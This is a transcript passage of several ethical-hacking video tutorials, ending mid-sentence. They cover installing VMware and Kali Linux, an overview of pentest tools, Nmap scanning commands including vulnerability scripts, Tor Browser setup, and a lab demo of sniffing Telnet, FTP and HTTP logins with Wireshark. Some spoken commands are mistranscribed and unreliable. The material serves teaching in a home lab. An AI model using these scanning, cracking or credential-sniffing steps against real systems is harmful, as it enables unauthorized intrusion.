Today I'm gonna show you how you can install the VMware Workstation Pro and how you can use it. First thing, what is VMware Workstation? VMware Workstation is a virtual machine software that is used for x86 and x64. That means 64-bit and 32-bit. Computers run to multiple operating systems over a single physical host computer. Each virtual machine can run a single instance of any operating system such as Microsoft, Linux, Unix, etc. VMware Workstation strongly support hardware compatibility and work as a bridge between host and virtual machine. All the devices drivers are installed via the host machine. VMware Workstation allow for the installation of multiple instances of different operating systems, including client and server operating system. It helps to network or system administrator to check, test, and verify the client-server environment. Administrator can also switch between different virtual machines at the same time. Before beginning, if you are new to my channel, please don't forget to subscribe, like, and share my video. With that, I'm gonna show you how you can download the workstation. I'll put this link in the description of this video. And once you go here, you have to download the Windows version. So because I'm using Windows, if you're using Linux or any other things, you can use from here. So you have to buy a license for this one. I'm just downloading and show you how you can use it. So if you really like this one, you can purchase it, but you can use the 30 days trial without any registration. So click on download. Once you click on it, it will download from here. So I'm not gonna download. I will cancel it because I already downloaded it. Close this one, and this should be on my download folder. Right click on it, run as an administrator. And once it pop up this one, you have to click on next. I accept the terms and click next. If you want to change the installation path, you can change from here, but I'm not gonna change it. By default, it will install inside the program files, and click next. If you want to check the update for the startup, so you can check mark this one. And if you want to join the customer experience improvement program, so you have to check one, and I'm not gonna check with it, so click on next. And this will allow you to add the shortcut on desktop, so click on next and click on next. It will begin to install. Okay, so once successfully installed, you have to enter the license key here. If you have, you can install, you can put it here big, and then hit enter. Because I don't have right now, so I'm gonna skip and finish. So right here, if you see the shortcut, open it, double click and open it. And I don't have the license here, you can put it here if you have, and I don't have it. Click continue and finish. Here is the workstation. You can create the multiple virtual machine from here. Click on file, click on new virtual machine, and click on next. And if you have the operating system, you can install from here and click on next. Because if you have ISO, you can select from here, and I'm not gonna install right now. Then click on next. What type of operating system you want to use it. I'm gonna with the 10. And if you want to choose any location, and you can feel free to choose it. Next. And this one is the storage one. And if you want to split the multiple file, you can use from here, because I normally use the single file because the single file is more easy to move here and there. So click on next, and this is the review here if you see it, and you can adjust from the customize hardware. So you can remove, you can add. Let's say, let me remove this and add. So sound, install USB controller, finish, and it will install here. So click close and finish, and you'll see right here. See right here, if you see all the devices information here, click on file again if you want to create a multiple server, and click next. Choose the operating system later, and I will choose this one, Linux for now, and I will say Ubuntu 64 because I like it. And the same thing, click next. If you want to store the single, you can search from here. You can put anything up to recommended, whatever you want to, and click on next. And this is the same thing as I told you earlier. Click on finish, and you'll see right here. Now you can go back and forth and manage the operating system. And once you power, click on edit and add the operating system here. And I believe I don't have, I don't have ISO. So if you have ISO, you can choose from here, and wherever you have selected, and you can open it. And once you choose all those settings, and then you have to power up from here. I hope you like my video. Please don't forget to subscribe, like, and share my video. This is the pretty much for it. If you have any questions regarding to it, please let me know, and then please comment below. And if you have any topics, please let me know, and then I'll try to help you. Today I'm gonna show you how you can install Kali Linux in different ways. Before installing, what is Kali Linux? Kali Linux is the Debian Linux distribution that is maintained by Offensive Security. It was developed by Matthew and Devon. Kali is specially designed operating system for the networking analyst, pen tester, or in simple word, it is for those who work under the umbrella of cybersecurity and analyst. So Kali Linux is to be used by those who professionally pen test, cybersecurity expert, ethical hacker, or those who want to learn or operate it. So why Kali Linux? If you are interested in pen testing or cybersecurity stuff, you need some specific tool to perform some tasks which pre-install and settle up to in Kali Linux. So you may directly use them without doing any configuration, or in case you want to check the vulnerability on the website or want to know cyber related bugs in any application. It is great to go with Kali Linux. Today I'm going to show you how you can install Kali Linux in different ways. Before beginning, if you are new to my channel, please subscribe, like, and don't forget to share this video. With that, I'm going to show you the first step. The first step is you have to create a virtual machine. If you don't know how to install VMware Workstation Pro 16, please go to my previous video so you can watch it and you can configure it. If you go to new virtual wizard, you have to go typically recommended and click next. So install Kali from here. If you don't want to, that's up to you. And browse. I will go to my folder. If you don't know how to download, I will show you how you can download. And next, Linux. I will go with the other Linux 64-bit. Next, and you can put the name here. Is this Kali? And I will go to free from the new folder. I will put here Kali. Okay, and next you can specify the disk, and you can store the virtual drive single. If you want to multiple, then you can select here. I don't want to. Next, and you can review here. If you want to customize the hardware, you can click on customize. After that, you can maximize your RAM and processor if you like to. If you have enough processor, go ahead up to whatever wants to. And once you're satisfied with all the settings, click on close and finish. After that, you can power up this Kali. I'll put these links to my description below. You can download from there. There are the different links here. If you want to use the virtual directly, you can just download from here. Or if you want to go download ISO, whatever I'm doing right now, so if you click on this one, it will start automatically download. In my next options, I will show you to use this virtual machine. Once you upload this one, it will ask you the different couple options here. I will go to the graphical install. Click on continue. English, if you want to choose any language, you can choose from here. Click continue, and you can choose any country where you are belongs to. Click continue. If you want to choose any keyboard layout, you can choose from here. I'll go with American English. So it's detecting the and mounting the installation media right now. Alright, if you want to choose any host name, you can type it here. You can type anything, if whatever is suitable for you, and click continue. Domain, if you have any domain controller, you can use here. I don't have any right now, so I will continue it. If you have any, put it down here. Put the full name user, so I will put Spy Cyber. Click continue. User account will be same, that's fine. Click continue. This is the password for the user. Click continue, and it will start checking the clock, setting up clock, and getting network information. It will start from here. If you want to choose country, desired that time zone, so I will go with the Pacific time zone. If you want to select any of them right here, click continue. So if you come to here, if you want to choose the partition, you can choose from here. If you want to go with manual, you can go with manual. There are different ways you can do it. I will go with the basic guidelines because it doesn't really matter. So if you want to go with the manual, you can go ahead, choose the manual and click continue. It's the same thing. If you want to go with this one, you can choose a hard drive. So you can choose here, you can continue. So I will go with guided partition, click continue, and click continue, and it will automatically do all those partition for you. And if you are satisfied with this one, you can go ahead and complete the finish partition. After that, it will start installing the program operating system. You have to choose yes here because it will change your disk. Is saying that, hey, I'm gonna change the partition for you, and then it will format, everything will be wiped out. So I will say yes. If you do no, it will go back, and then it will again start for the beginning. So we have to choose yes. And now it's installing the system. Alright, in this section you can choose the desktop environment, and you can choose whatever the most popular top tool. So I will go the default and click continue. Alright, once it's completed, you have to click on yes. You have to choose /dev/sda. Click continue. It will install the bootloader. Alright, installation has been completed. If you click on continue, it will reboot your virtual machine. Alright, log in with your credential. Alright, let's test a ping to Google. Alright, there you go. The installation has been completed. I'll go with the next process. For that, you have to download the virtual machines. You have to go Kali web portal and you have to download the virtual machine. Once you download the virtual machine, so which platform you want to download, so VMware or VirtualBox. So I'm gonna go with the VirtualBox right here. So once you click here, it will start downloading. I will cancel this one because I already downloaded it here. Once you download the OVA file, once you download it, you have to extract that downloaded file. Right click it, go to extract it. Once you extract downloading, you have to go open virtual machine and you have to go ISO downloads, and you have to open this one VMX and open it. It will import all of your VMs. Those are the description right here. If you see, these are the all description. Password and username is Kali. Once you power this up, you have to use those password. So you have to copy it. It will start booting up. So once loaded, use Kali and log in. Now you are able to install Kali VirtualBox in two different ways. After installing Kali, there's a 10 best way how we can make Kali Linux better, smooth and secure. As you know, the Kali Linux is the greatest OS when it comes to pen testing. Once Kali Linux is successfully installed, there are a few things that you need to do and understand before moving forward. Today I'm gonna show you those 10 best ways to make Kali VMbox secure and smoothly running. Before beginning, if you are new to my channel, please press the subscribe, like button, and don't forget to share this video. So number one, change the default password. So for that, you have to go terminal and you have to type sudo ROOT. You have to type your new password here. Once you change the password, you'll get this message: password update successfully. Let's try to log in with that root password. Log out, root, and password whatever you assign. Alright, I'm able to log in with my new password here. I'll go back with the Kali user again, and then I'll show you the next step. Number two is you have to upgrade or update your Kali Linux. For that, you have to type sudo apt update. Type your password here. First thing, we have to update first. After that, we can go to update the packets. This one is really depends upon your internet connection. I don't have any update right now. Alright, the next command is to upgrade your Kali. So that will be sudo apt upgrade. Once you hit enter, it will start installing the latest package. So once you do that, it will start all of your packages installing. I will cancel this one for now. It will take forever. I'm not gonna go with that. I'll cancel it. So number three is update to a faster Kali repository. Let's go ahead and jump to that one, how you can change that the storage and fasted Kali repository. I'm gonna cancel this one. For that, you have to type sudo vi. Is our text editor for me. If you don't have you can use any text editor. So I will use the vi for now. And you have to go /apt/source.list. So once you come here, you have to type E for edit anyway. So see here, I already update to the storage path here. If you want to change this one, you can change from here. I'll go ahead and do ESC from keyboard and semicolon quit without saving. So Q and exclamation mark. Hit enter. Number 4 is take a snapshot on the VMware. If you want to roll back any changes, obviously you messed up to the Kali. So if you want to be safe, so first thing, once you install Kali, go ahead and take a snapshot, right? Click it and snapshot. Take a snapshot. Like whenever you messed up, and then if you don't know how to fix it, that will help you a lot. So type any name here. I'll say fresh install and take a snapshot. Once you take a snapshot, you can always go back and you can reverse back with the snapshot and whatever you have here. So click on the snapshot, whatever. Right now I just took this one, so you can just click on that and then it will reverse back to your original state. With that, I will go with number 5. Number 5 is enable share clipboard and drag and drop. For that, you have to go back the Kali settings again. Click on settings. Once you click on settings, there is options right here, and you have to go guest isolation. You have to enable checkmark this one. This is grayed out right now. Once you shut down your Kali, you can uncheck and checkmark after that. So click on OK. So then how you will able to copy from your original computer to the virtual machine. Number 6 is disable the screen lock. So for that, you have to go click on here, go to settings, and if you see right here power management, click on that. So display, so you have to change all of these settings. If you want to, you can change it on the security right here. So what you can do is you can do never. Once you do never, and then you can check this one. So you can delay whatever, because every time, every 5 seconds, it will lock your computer. So while you are trying to pin testing, or while you are trying to do anything on the computer, it doesn't have to be automatic lock. After that, it won't automatically lock this session. So close that, and you don't have to do anything after that. Number 7, create a low privilege user. You don't have to use the highest privilege root password or user on while you are pin testing. For that, is important that you don't allow all the application to use the root privilege. So there are some application and script that should not be allowed to run as a root user. So that's why we need to adjust lower privilege account or user. Okay, let's create a user for that. Sudo add user, let's say spy underscore cyber. I'll just use this one. It will ask you to use new password. I will put password here. And this is the information. You don't have to put it, but if you want to, you can put it from here. You can type here. So hit enter, hit enter, hit enter, enter, enter. And if you want to, it will ask you to the information is correct, and then you have to type or type yes. After that, we are able to create a user, and we need to add that user to the group. For that, you have to type sudo user mod -a capital Z sudo, and you have to type this username. Copy and paste. Hit enter. You are able to do it, and then after creating user, and after adding user to the group, you have to add that to bin folder. So for that you have to go sudo chsh and dash as /bin /bash and your username. Copy and paste it. So you are able to create the low privilege account. After that you can log in with this account on your Kali Linux. Let me do it that. Type spy_cyber and type the password whatever you assigned it. I'm able to log in successfully. You can use this account to pen test. I'll go back to use my regular Kali. Number 8, install console. If you are going to perform hacking, you will be running multiple or many terminal windows, and monitoring them is not that easy, right? To monitor all those terminals in the single command window, you can use the terminal multiplexer. So terminal multiplexer will load all those terminal in the single command or single terminal window. So for that you have to type sudo apt-get install console. So hit enter. Once you hit enter, it will install your console. I already installed on my computer, so it is not going to install again. To run that console, you have to type console console. So after typing that, you'll able to see multiple windows here. So right here, and then all you can split them to the multiple bottom to top or left to right. You can just type cd etc, right? pwd. So you are on cd right here, and then you can do, let's say, cd home pwd. So this is the how the console works. You can use another one and you can split to right. So normally the basic thing of this one. So if you want to 2x2, if you want to use like a multiple console on the single command or single Windows, so that will be helpful. Number 9, install Visual Studio Code. I have been using Sublime in the past. I switched over to Visual Studio Code. Is one of my favorite tool. I started to use Visual Studio Code in my Kali Linux for my Python code. So for that you have to go to Google, or you can just directly go to code.visualstudio.com /download. I'll put this link in the description box, so you will able to access it. Once you go here, you have to download this one. I already downloaded here, so it should be on the download right here. So you have to download exact same .dev. After that you have to go terminal again. So in terminal, cd home Kali downloads. So once you go here, so you have to type sudo apt install / whatever the version it is. So you have to rename this. Version is code dot. So hit enter, type password here, and it will install for you. It has been installed, so you can browse from here. You can type Visual Studio Code right here. So now you can edit all of your codes from here. Alright, so this is the Visual Studio Code. Once you open it, I'm not gonna do anything right now, so I will go to number 10. It's Cherry Tree. Cherry Tree, so Cherry is the so cool program. So that is the note-taking application features, reach to text, syntax highlighting, image handling, hyperlinks, importing, exporting, with support for multiple formats. So I personally like Cherry Tree to use to take all notes. For that, you have to go here, type Cherry Tree. So here you can do from here. So you can just put the add a node here and type that node. Let's test. And you can put the color. There's a so cool. If you want to put the rich, you can put it there. If you want to plain text, you can do from there, and then you can type right in here. So if you want to put a screenshot, so screenshot of this guy, take a screenshot and try the screen. That's okay. And save to desktop. I'll put save desktop and copy, paste it here. So this is the cool. This is so cool. So edit image, you can just adjust image from here. If you want to, you can do whatever you want to. Those are the most important 10 things after installing the Kali Linux. So if you feel this videos is really good and helpful for you, please subscribe my channel, and don't forget to hit the bell icon, and don't forget to hit the subscribe button. That's how we will stay connected, and that will give me power to make more video. In my next video, I'll show you Nmap tool, so how you can scan the ports, how you can use the Nmap tool. Today I'm gonna share with you the 5 top most important tools in the ethical hacking world. Ethical hacking is also called pen testing. Hacking is the process of gaining access a computer system with the intention of fraud, data stealing, and privacy invasion, etc., by identifying its weakness. It is also one of the best methods to augment a skilled security professional of an organization. Making ethical hacking part of security effort of an organization can provide to be really helpful. So why ethical hacking tool? Hacking tools are programs that generally crack or break computers and networking security measure. Hacking tools have different capabilities depending on the system they have been designed to present. So number 1 is Nmap tool. Nmap is used for port scanning. One of the first phase in ethical hack is the finest hacking tools ever. Primarily common command line tool. It was then developed or operating system based on Linux or Unix, and the Windows version of the Nmap is now available. Nmap is basically networking security mapper capable of discovering services and hosts on the network by creating network map. If you are in the Kali, you can run nmap 192.168.35.137. Once you run this command, you can get a lot of information from that host. If you are new to Nmap, please check my previous video. I have explained a lot of commands on that video. Don't forget to check my video. If you see right here, you will see this port, open and close port. So this is how Nmap works really great. Number 2 is Nessus tool. Nessus tool is really great features for ethical hacker. So The Nessus is the old, most well-known vulnerability scanner, which was designed by Tenable Network Security. It's free and safely recommended for non-enterprise users. This is network vulnerability scanner efficiently find critical bug on any given system. So there are different products on the Nessus. If you go to Nessus tool portal, so there are a lot of things you can see right here. You can sign up for up to 16. This is the free of them. You can scan up to 16 IP address, so you can download from here. If you want to get a professional version, you have to buy for it. So there's a lot of features and great features on the Nessus tool. If you like to try and give a try, you can go with the Nessus Essential first. After that, you can upgrade to professional or whatever you want to. With that, number 3 is Metasploit. Metasploit is a framework in open source, and Metasploit Pro is commercial offering within 14 days trial. Metasploit is the graded towards the pen testing. An ethical hacker can develop and execute exploit code against remote target. So there are a lot of things you can do on Metasploit. So for that, you have to run MSF console. So once you load the Metasploit, you can do search of a lot of vulnerability right here. You can go with all of them. For if you want to search for it, you can go to search question mark and then hit enter. It will give you all the possibility of your exploitation and all those things, and then you can go and research on it. Number 4 is Burp Suite. This is the security testing tools, comes with 3 different prices. It's the community version, professional version, and enterprise version. Burp Suite distinguishes itself as a web vulnerability scanner, and then is the most popular tool for the ethical hackers. For if you want to launch that Burp Suite, you have to go on application and type BURP suite, and once you open it, you can click on temporary project, click on next. I am using the community version right here, if you see right here. So click on startup. So you can try from here. You can use all the target, proxy, whatever you want to. If you want to really like the Burp Suite, you can go on the Burp Suite portal and you can try all these products right here. So if you go the production, Burp Suite, enterprises, professional, community, so I'm using community version right here. So if you like, you can go with all the enterprises and the personal one. Number 5 is Hashcat or John the Ripper. Password cracking is the biggest part of ethical hacking. Hashcat and John the Ripper, a robust cracking tool. It can help ethical hacker audit password security, retrieve lost password, and discover the data stored in the hash format. These two are the most popular password crackers all the time. It also one of the best security tools available to test or auditing one remotely. These password crackers are able to auto detect the types of encryption used in almost any password and will change the password test algorithm accordingly. If you want to use Hashcat, you have to type Hashcat. So this is the A as an algorithm and the medium text and whatever the password you want to crack it. If you go to Hashcat portal, on this you can see right here, so how you can use is all this algorithm right here. So you can take a look. If you like to use it, you want to try it, go ahead and try it. So all these things you can download from here. I'll put all these in my description below so you can check from there. With that, I will go with John Reaper. So if you go to John Reaper, you have to type John dash help. So it will give you all the possibility or options you can try from here. So if you see right here, you have to use John options and password file. If you have a password file, you can use that. I already shown you two password files from the Hashcat. So this is my path where you can check the word list. I will put this one to your to the description below so you can check on it. You can download the rocku.txt from the GitHub. I'll also put this in description below so you will able to download it. Also, what you can do, so I'll put the example right here so you can check on this one also. So John the Reaper examples command line, so you can go all over this one, whatever you wants to like and whatever you wants to try it. With that, I will give you one more thing. This is the bonus. Kismet is one of the most popular ethical hacking tool. It works network detection, packet sniffing, and a lot of other things. It works so well to any other wireless card. We support raw monitoring and can sniff 802.11a, 80.11b, 802.11g, and 802.11n traffic. The programs run under the Linux, FreeBSD, NetBSD, OpenBSD, Linux, and Mac OS. So for that, you have to go on the application and type Kismet, and then you have to click here. Automatically runs under this one. So you can use this as the options right here. You can use the version. You can see all of this one. So you can see this one, the version is right here. All right, those are the most 5 best tool for the ethical hacker. So if you want to build up your career in the ethical hacking, I will put this all of the links in my description below so you will able to access them. Please, if you like my videos, don't forget to hit the subscribe button and don't forget to like my video. And also, one more thing, don't forget to share. In this video, I'm gonna show you best 7 important Nmap commands to scan remote host. So what is Nmap and why it's important? Nmap is a networking scanning utility used for port mapping, host discovery, and vulnerability scanning. Most of its functions are based on using IP package analysis to detect and identify remote host, operating system, and services. Nmap is completely free for you to download and use. It's also an open source license project. Nmap is used by large companies as well as small size organizations for port auditing, host monitoring, pen testing, and similar tasks. And also this is important to system administrator. Before beginning, if you are new to my channel, please don't forget to subscribe and like my video. Number 1, basic Nmap scan. The basic Nmap is just running with the no flag, just the IP of the machine you are testing. This will also scan your IP address on the set of around 1000 of the most common port, determine if any are open or not, and then list the open ports. For that, let's type the command. Go ahead, open the terminal, type nmap dash, so the host name or host IP address 10. I'm just using 11.127. So if you see right here, there are 3 ports. Those are the ports open in the 10.10.11.127. Let's go to number 2. Number 2 is OS enumeration. OS enumeration, it will help you to flag the operating system. Either you are running the server scan, or either you are scanning Windows machine or Linux machine, host itself. For that, you have to type nmap, and the IP will be same, and dash uppercase O. O will scan all of the machines with the operating system. For that, we need to run as an root privilege. So after scanning, if you see right here, the aggressive OS guess is Linux 4.15. And also those are the ports open as you see on the screen right here. If you scan the Windows, it will show you the operating system, exact operating system. With that, I will go with number 3, default script. So this is where the power of nmap really start to show. The nmap scripting engine is also known as NSE, allow anyone to add functionality to nmap by means of script, which can be superchange nmap to identify specific application. Listening on the port scans for the known exploit. Those application scans for the common misconfiguration of the services. So I much more about that. So for that, the command is nmap. The IP will remain same. That's SC. So dash S is the lower S and the C will be the upper S. Hit enter. In this one, if you see any misconfiguration or any detection, it will display under this command. With that, I'm gonna go with the number 4, which is nmap ping scan. If you are scanning on the large environments, if you don't know those hosts are up and running or those are down, so for that you have to go, this is the most famous type of scan in nmap pinging scan. It is also because of it's often used to perform nmap ping sweep, and it's the easy way to detect hosts on any network. And don't forget, okay? So the drawback of nmap is only type of scan is that remote hosts often block IP beginning the packet. The drawback of this ICMP only type of scan is the remote hosts often block IP being ping packet. So don't forget that, okay? If you run the ping sweep scan, maybe firewall may doesn't like the ping sweep. Please be aware of that. Okay, so the command is nmap space s and lowercase and 10.10.11.0/24. So I'm just scanning /24. You will see the list here. All right, if you see right here, those are the up and running in the my network. It will scan up to 256 IP address. All right, so it will also show 22 hosts up. All right, so with that, I'm gonna go with number 5. Number 5 is scan the most popular ports. As you know, the most popular port are those are the 0 to 20. Or if you want to scan 0 to 20, or if you want to scan 0 to 50, so those are the most top ports. Or you can also customize up to 100, up to 1000, whatever you like. So using top ports lets you scan the top most common port for that host. So as I told you, like if you want to customize your top port, you can go up to 20, up to 30, or 50, 60, whatever you like. For that, the command is nmap -- top ports space 20 10. The host IP is 10.10.11.127. So if you see right here, those are the top 20 ports in the host. If you want to go with the 50, you can type 50 here. It doesn't really matter. So you can scan whatever you can put there up to 50. You can put like 20, 30, whatever you like. And number 6 is CVE detection using Nmap. CVE is common vulnerabilities and exposures. Alright, the command is nmap dash uppercase p lowercase n dash script. So vuln, this is the vulnerability of shortcut. So 192.168.35.137. It will take a little bit time to scan the vulnerability. The scan has been completed, and if you see right here, it doesn't find any vulnerabilities. If you scan any other vulnerabilities host itself, it may show right here. I'm gonna go with number 7. Scan all TCP ports. On TCP port, we will use -p, so which will help you to find all the TCP ports. So for that, the flag typically used to define a range of port to scan, for example, like 100, 100 to 200. You can also use -p 0-65535. Those are the whole port with the TCP one. So let's go with the command. For that command, you have to use nmap. P is for port and 0-65535. This is the whole port, okay? And 192.168.35.137. This is the fast scan level for the nmap, so that's 5. So if you don't want to go with that, you can also use you can go with the -p. All right, so remove this, or you can also go with -p and remove -p right before 37. And also, if you want to go with the TCP-T5, so this is the fastest scanner. I'll be right back. It will take a little bit of time. Be patient. Port scanning has been completed. So if you see right here is scanning, it is scanning up to 10051. It will go up to 65535. Those are the most 7 important nmap commands to scan the host. So if you guys like my video, please don't forget to subscribe and don't forget to like. That will help me to create a new content. So thank you for watching. A lot of you requested me to create this video, how we can install the Tor browser, how we can install the Kali Linux with the different ways. In this video, I'm going to show you how you can install the Tor browser in Kali Linux. Before beginning, what is Tor browser? The Tor browser is onion routing browser, is a web-based design anonymously web surfing and protection against the traffic analysts. Although Tor is often associated with the dark and criminal activity, law enforcement official, reporters activity, so on, the United States Navy originally designed the browser to protect sensitive US government communication. Then how it works? The Tor browser works by using a technology known as onion routing. The onion router is peer-to-peer, is also known P2P. Overlay network that enables users to browse the internet anonymously. Onion routing uses multiple layers of encryption to conceal both the source and destination of information sent over the internet. It is designed so no one can monitor or censor online communication. With that being said, if you are new to my channel, please don't forget to subscribe, like, and share. Without wasting your time, let me deep dive into the installation process. So once you open the Kali Linux, you have to go www.torproject.org. And once you come here, you can click on download Tor browser and you can install. For now, I'm going to install on Kali. For that, I will download for Kali. So you can also go like furthermore details. And once you click on that, you have to click on save. click OK, and once you download this, we will able to navigate that folder, install the Tor browser. Okay, so download had been succeeded. Okay, so now you have to open the terminal. Let me make you a little bit bigger so you can see here. So let's go to CD download. Once you do download, do ls. Ls will show you the files inside the download folder. After that, we have to do tar dash xf and the name, the Tor browser name. You can also tab there. Once you do that, it will create a new folder for you, and we will also verify the signature on that. Okay, so it has been extracted from that folder, and we will do one more ls. So you will see the Tor browser here. Now we can go inside the Tor browser, and we will do one more ls. You can literally start from the Tor from here. Also, I would like to do one more thing to signature verify, so that's so important, and I highly recommend it, because if you are using the Tor browser, and that might need to be the latest version, and that need to be a key, which is important. So that's important. Okay, so without that being said, I have the command. Let me copy from here. Let me copy from here and paste here. And this is the PGP auto key located, and this is located to key Tor browser at Tor project, so which is right here. So Tor project, okay. And let me copy from here and paste it. So I will also put this command in the description below, so you will able to get from there. Once we hit enter, it will show you the keys, is that the latest version or not, is that expire, and then the like random generated key. Okay, so just make sure you are inside the Tor browser to create the signature. So I highly recommend it to inside that folder. If you go outside of that folder, it won't create for you. Okay, so if you see RSA this and expire with this, and this is the key that we need to export it, and this is the sign key. So this is so important. So sometimes someone sends you with a different, like the signature key, and if you open that, and then that will be high chances to get compromised to your computer. Okay, so I have one more command. Let me open this notepad, paste it below right here. So if you see right here, it says outdated server may lack up important secret fix. That's what I told you. And use the command this and the kill, because we haven't restarted yet, so we don't have to worry about that. Okay, so let's copy this and paste it here. And what we'll do here is copy this and paste it here. So that's how we will exporting Tor keyring. So this is exported as a file, so we can utilize that file for the future. Once you hit enter, it will create you the file, and I will do one more ls. So right now we will see the Tor keyring. Once we do that, I will show you one more thing to verify the signature after importing, because we already import and export the Tor keyring. Now we have to match where the signature valid or not. So once you see right here, I pointed to download Tor Linux Tor TZ, and this is the ASC signature. You can also download the signature from Tor browser, and once you click here, and it will pop up you to save an ASC file. Once you download the ASC file, you can navigate to inside this. You already extract the files inside this on. So if you copy whole things, and you can come here and because we are in the Tor browser inside, and copy paste here. So once you hit enter, it will show you the good signature from Tor browser developers, and this is now we are secure. Okay, so with that said, we can start Tor browser desktop. So if you hit enter, it will open the new browser for you. I'll show you the things so important, so how we can use this Tor browser. But I highly recommended you guys to don't use full screen. I don't recommend to do that. I will also do the same exact browsing things to make sure. Also, there are a few things we might need to consider. Once you click here on this is the security and change. So if you do the safest, you have to do this one. So because this will impact the media, but however the script will disable, because like sometimes JavaScript may launch once you browse that website, it will launch automatically on your computer and install for you that even you don't know. That's the more important. So once we click here with the little three dots and click on settings, you have to click on connection, and there is right here settings, and I will use a proxy. So I will always recommend it to use this one. However, it really depends upon you. So 127.0.0.1 and port. If you don't care, so it doesn't really matter for you, so this should be automatic. And that's how we can connect now. Okay, so if you see right here in the corner side, it says connected. So just make sure you are connected, and it's here right here. So if you go to the same settings and connection test with the Tor network connected. Okay, cool. And you can do the dog privacy, and you can search from here. So that's how we can install on the Tor browser. And also I will show you the next step where we can install the Tor browser on the Windows side. Thank you for watching, and I'll see you in my next video. As I promised you in my last video, today I'm gonna show you how you can hack, or how you can easily find username and password from the Wireshark. If you don't know how to install Wireshark, I will also show you today in this video how you can install the Wireshark. After that, how you can find the username password easily with the FTP, HTTP, and Telnet, and other so on. If you're new to my channel, please don't forget to subscribe, like, and share. Without wasting your time today, let's dive into the video. So this is the Metasploit table. This is my calendar. If you go to wireshark.org, this will display. If you want to know more about this one, you can just go to wiki. Once you click here, you will see a lot of the tutorial. If you want to learn more, you can go ahead and search from here, from title. You can also do a lot of stuff on this one. If you are a network administrator, if you are a pen tester, you can do a lot of troubleshooting, a lot of things on this one. So how you can download them? If you click here, it will redirect you to download the Wireshark. If you want to download for the Windows, this is so cool. This is really for the Windows installer. This is for the portable. You don't have to install it, the Mac, and so on. I'm gonna show you for the terminal. So before that, what is Wireshark? Wireshark is open source network protocol analyst software program, widely considered industrial standard. It is also a lot of like governments, agency, corporation, non-profit organizations, a lot of organizations they're using right now. How it works, I will also show you that. So if you're new to my channel, please don't forget to like, share, and subscribe. There are a ton of video if you want to really grow your career in networking, pen testing, and hacking. This channel will be helpful for you, so don't forget to press subscribe button. Don't forget to share, like, and that will really helpful for me. Once you open the terminal, you have to, let me make it a little bit bigger for you so you can see it. So you really don't have to install, but it's some reason if there isn't, you can easily install by typing sudo apt get install wireshark. So once you hit enter, it will install it, but I had already installed it for you, so it may not install. Let's type the password for there. Alright, once we install it, you can also open from the terminal, or you can also wireshark. So you can click on here and you can open from there. Also you can use sudo wireshark. So hit enter and it will open the wireshark. So which one is our network adapter? So that first thing we need to know which adapter we are using on the terminal. And if you do ifconfig, so let me make a bigger figure and hit enter, it will show you the adapter for which adapter Kali using. So it's 0 we will capture our packet on 80. So let's exit this one and close this, and we will go here, double click on it. So as soon as we click on it, let's minimize this. This is the features for the wireshark. So wireshark is the really cool, and you can, there's nothing right now as long as we go here and start pulling the information, you will see a lot of stuff right here. So with that being said, as I told you here, I have Metasploit, which is the Metasploit IP is 192.168.35.141. What I'm gonna do here is, let me stop here, let me stop it and open it again. So here's the thing I want to show you, because this is, we really don't want it. You can also go to from view and you can just remove this, the package bytes. We don't need that really. So also you don't, if you don't want to use color, so here's the color. So you can just remove the color. Personally I like the color, so you can just click on here. And also you can expand this. You can also go to the end of the capture automatic, so it will, you don't have to scroll down and up and down, so it will automatically go while the capture the package. All right, so there's a lot of things. If you want to really deep dive into the wireshark, you can go to wireshark wiki things. You can just click here, and as I told you, like the wiki things, once you click on wiki, you can literally search from here and then find a lot of things, as I told you. Also, while we are doing this, I want to show you one thing. Let me do one thing. I'm gonna telnet on this box. Now I'm gonna show you how you can capture the password and username from the Kali. So I have the box right here, as I told you, Metasploit. What I'm gonna do here is open the terminal, do telnet. So telnet, so this is the IP as I showed you earlier. So the IP is 192.168.35.141, and once you hit enter, so let's start the capturing the file here. And once you hit enter, it will ask you to the login page. So this login page, if you see right here, there are a lot of things running in the background. If you do this, do msf admin. All right, and password is also msf admin. And if you are here, yeah, we are already in the box. So this is the IP, right? What we have to do here is, this is the code, right? So this is really cool. Let's run in the background and stop this, because we already captured the file. We don't have to. We will see here is telnet. Okay, so once we do telnet here, so you only see the data with the telnet protocol on the protocol tab, right? So this is source, this is the destination, and this is the protocol, and this is the length, and this is the info about the. In this section, if you also wants to do here is you can configure right here, and then you can do the columns. You can add more columns here. So if you really wants to, you can add here title, and you can start from there, but I'm not gonna do here. So with that, how we can see the password then? The password is really cool. Now here, if we go a little bit down, telnet data, once you see right here with the highest length, so you will see the telnet. So right here, the telnet data right here. And what we're gonna do right now is, because this is the Metasploit login, so if you right click it and flow TCP stream, once you do here, and then you will see the different one, and this is a TCP stream, you can easily find the Metasploit login and Metasploit password for this one. So that's what we did is IP config right here and Ethernet 0, so it will see everything. So that's why telnet is really dangerous for so that is not really secure and encrypted. So now we know username and password. What we can do here now is let's try to do FTP, right? So how we can capture that FTP, let's go. Close this. Now I'm gonna show you how you can hack the FTP username and password from the WireShark. All right, so let's do one thing. I enable FTP on my Kali itself, so I will also put the command for FTP if you want it. So after that, you can install FTP to another machine and you can actually hack from there. With that, I'm gonna show you how you can log in with the FTP. For that, I will start capturing FTP. Let's do the Kali because I install FTP on my Kali Linux. I will use the Kali machine IP and 35.138. Once we hit enter, it will prompt you the password login. Okay, so my password is, my username is KALI, and I'll also use the same password, KALI. Hit enter, and if you see right here, it is capturing. And what I'm gonna do here, I will exit from here, and also I will stop because I don't want to capture the files. So you can do FTP from here. So once you do FTP, there are a lot of response from here, and you can see the different protocol combination, port, destination, all those fun stuff. Everything, whatever I type here, you'll see everything flow by the time. And there is also one more cool feature I'm going to show you here is if you do ftp.request and arz is the only filter by the connection and the successful request. Once you hit enter, and you will see the FTP connection, and you will see right here there will be username and password. So once you come here, you'll see the user file transfer protocol, which is FTP, and you will see the user and the argument is Kali. So, and then also with the same thing, you'll see say the pass and the argument is Kali. Also, what you can do, you can flow the stream, and you can see whatever the password and username has been typed, whatever we type here, you'll see it. So now, with that said, now I'm gonna show you in the HTTP. So for the HTTP, I have my Metasploit here, and in my Metasploit, I already started the web server, so you don't have to do anything. Now, what I am gonna do here, I access this 192.168.35.141 DVW is the damn vulnerability. So with that being said, I will use this start capturing here and continue with the saving. After that, we will start typing here admin, and this is the password PASSWORD, and once we hit login, and we will see the capture file. So you can remove this, and once we remove that, we will see the connection here. We are logged in here now. From that, we will see we will filter HTTP, and we will see the connection which was already, like the protocols is HTTP, and this is the source, this is the protocol, and so on. What is the cool thing is here, what you can do once we do HTTP, what also we can go narrow down and see the exact actual actions, whatever the request, and the connection is successful. With that, 